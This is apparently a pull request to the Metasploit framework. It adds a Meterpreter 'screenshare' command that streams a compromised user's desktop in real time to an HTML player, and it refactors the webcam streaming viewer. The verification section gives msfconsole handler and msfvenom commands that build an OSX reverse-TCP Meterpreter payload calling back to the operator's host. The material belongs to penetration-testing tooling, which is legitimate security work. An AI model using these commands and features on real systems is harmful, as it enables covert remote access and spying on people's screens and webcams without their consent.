### PR TITLE
Refactored webcam_stream and added live desktop screensharing/remote monitoring (OSX meterpreter)

### DIFF
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb
@@ -29,6 +29,7 @@ class Console::CommandDispatcher::Stdapi::Ui
       "keyscan_start" => "Start capturing keystrokes",
       "keyscan_stop"  => "Stop capturing keystrokes",
       "screenshot"    => "Grab a screenshot of the interactive desktop",
+      "screenshare"   => "Watch the remote user's desktop in real time",
       "setdesktop"    => "Change the meterpreters current desktop",
       "uictl"         => "Control some of the user interface components"
       #  not working yet
@@ -43,6 +44,7 @@ class Console::CommandDispatcher::Stdapi::Ui
       "keyscan_start" => [ "stdapi_ui_start_keyscan" ],
       "keyscan_stop"  => [ "stdapi_ui_stop_keyscan" ],
       "screenshot"    => [ "stdapi_ui_desktop_screenshot" ],
+      "screenshare"   => [ "stdapi_ui_desktop_screenshot" ],
       "setdesktop"    => [ "stdapi_ui_desktop_set" ],
       "uictl"         => [
         "stdapi_ui_enable_mouse",
@@ -168,6 +170,166 @@ class Console::CommandDispatcher::Stdapi::Ui
   end
 
   #
+  # Screenshare the current interactive desktop.
+  #
+  def cmd_screenshare( *args )
+    stream_path    = Rex::Text.rand_text_alpha(8) + ".jpeg"
+    player_path = Rex::Text.rand_text_alpha(8) + ".html"
+    quality = 50
+    view    = false
+    duration = 1800
+
+    screenshare_opts = Rex::Parser::Arguments.new(
+      "-h" => [ false, "Help Banner." ],
+      "-q" => [ true, "The JPEG image quality (Default: '#{quality}')" ],
+      # "-p" => [ true, "The JPEG image path (Default: '#{path}')" ],
+      "-v" => [ true, "Automatically view the JPEG image (Default: '#{view}')" ],
+      "-d" => [ true, "The stream duration in seconds (Default: 1800)" ] # 30 min
+    )
+
+    screenshare_opts.parse( args ) { | opt, idx, val |
+      case opt
+        when "-h"
+          print_line( "Usage: screenshare [options]\n" )
+          print_line( "View the current interactive desktop in real time." )
+          print_line( screenshare_opts.usage )
+          return
+        when "-q"
+          quality = val.to_i
+        when "-p"
+          path = val
+        when "-v"
+          view = true if ( val =~ /^(t|y|1)/i )
+        when "-d"
+          duration = val.to_i
+      end
+    }
+
+    print_status("Preparing player...")
+
+    html = %|<html>
+<head>
+<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE, NO-STORE">
+<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE, NO-STORE">
+<title>Metasploit screenshare stream - #{client.sock.peerhost}</title>
+<script language="javascript">
+function updateStatus(msg) {
+  var status = document.getElementById("status");
+  status.innerText = msg;
+}
+
+
+function noImage() {
+  document.getElementById("streamer").style = "display:none";
+  updateStatus("Waiting");
+}
+
+var i = 0;
+var imgurl;
+var imgElement;
+var didload = 1;
+function updateFrame() {
+  didload = 0;
+  imgurl = "#{stream_path}?" + i;
+  getImage(imgurl, i).then(
+    function(e){
+        didload = 1;
+        newImg = e.img;
+        index = e.index;
+        var theWrap = document.getElementById("vid_cont");
+        ni = theWrap.appendChild(newImg);
+        //console.log('added img_'+index);
+        ni.id = "img_"+index;
+        purge = document.querySelector("img:not(#img_"+index+")")
+        if (typeof(purge) != 'undefined' && purge != null){
+          purge.remove();
+        }
+        updateStatus("Playing");
+        
+    },
+    function(errorurl, index){
+        //console.log('Error loading ' + errorurl)
+        updateStatus("Waiting");
+        didload = 1;
+    }
+  );
+}
+
+function getImage(url, index){
+    return new Promise(function(resolve, reject){
+        img = new Image();
+        img.onload = function(){
+            var e = new Object();
+            e.img = img;
+            e.index = index;
+            resolve(e);
+        }
+        img.onerror = function(){
+            reject(index);
+        }
+        img.src = url;
+    })
+}
+
+setInterval(function() {
+  if(didload){
+   updateFrame();
+   i++; 
+  }else{
+    //console.log('skipping');
+  }
+},42);
+
+</script>
+</head>
+<body>
+<noscript>
+  <h2><font color="red">Error: You need Javascript enabled to watch the stream.</font></h2>
+</noscript>
+<pre>
+Target IP  : #{client.sock.peerhost}
+Start time : #{Time.now}
+Status     : <span id="status"></span>
+</pre>
+<br>
+<div id="vid_cont">
+  
+</div>
+<br><br>
+</body>
+</html>
+    |
+
+    ::File.open(player_path, 'wb') do |f|
+      f.write(html)
+    end
+
+    print_status("Please open the player manually with a browser: #{player_path}")
+      print_status("Streaming...")
+    begin
+        ::Timeout.timeout(duration) do
+          while client do
+            data = client.ui.screenshot( quality )
+
+            if data
+              ::File.open(stream_path, 'wb') do |f|
+                f.write(data)
+              end
+              data = nil
+            end
+          end
+        end
+      rescue ::Timeout::Error
+      ensure
+       
+      end
+
+      print_status("Stopped")
+
+      return true
+  end
+
+  #
   # Enumerate desktops
   #
   def cmd_enumdesktops(*args)
@@ -178,7 +340,7 @@ class Console::CommandDispatcher::Stdapi::Ui
     desktopstable = Rex::Text::Table.new(
       'Header'  => "Desktops",
       'Indent'  => 4,
-      'Columns' => [	"Session",
+      'Columns' => [  "Session",
               "Station",
               "Name"
             ]


### PR DESCRIPTION
Seeing as there hasn't been much work done on the OSX meterpreter front since this thread died (#8439) I figured I'd take a stab at it.

Started by refactoring the **webcam_stream** player to utilize JS promises, implement proper caching headers for Chrome, and added a cleaner animation technique for frame-to-frame transitioning. 

Eventually this should be completely re-worked to integrate with ffmpeg/image2pipe and stream a video to an HTML5 player (while optionally persisting to disk), but I wasn't in the mood to tackle that one today 😄 

Later, while testing the screenshot functionality included in the master branch, I started wishing I could just see a live view of the remote desktop instead of having to constantly take snapshots, look at them, take some more, look those ones, etc. etc.  After digging into the code for the **screenshot** and **webcam_snap** commands, I figured it'd be relatively simple to massage the code I had refactored for the **webcam_stream** player and put together a new command/method for live desktop sharing (**screenshare** is the command).

## Verification

List the steps needed to make sure this thing works

- [ ] **Start a handler:** `msfconsole -qx "use exploit/multi/handler; set payload osx/x64/meterpreter_reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j"`
- [ ] **Generate a macho:** `msfvenom -p osx/x64/meterpreter_reverse_tcp LHOST=$LHOST LPORT=4444 -f macho -o out`
- [ ] **Select** the proper session
- [ ] **Test** the new command "screenshare"
- [ ] **Test** the refactored "webcam_stream"
- [ ] **Have fun!**

-----
The code is all self explanatory for the most part.  All **screenshare** additions are here: `lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb`
And the **webcam_stream** mods can be found here: `lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb`
-----

With regards to the refactored "player" code, we moved from a simple setTimeout() function changing the image URL and appending a query string (making the client reload the img from server) to a promise-based system with a lock-out mechanism to prevent overloading the network.  

The old display method was stuttery, had low framerates when it was functioning, suffered wayyy too many frame drops and didn't function on slower networks.  This seems like a good temporary fix for those problems (and actually performs a hell of a lot better than I expected for a glorified flipbook) until someone feels like integrating a true video solution.

Once that person does, however, it will be very easy to apply it to both the **webcam_stream** and **screenshare** methods.
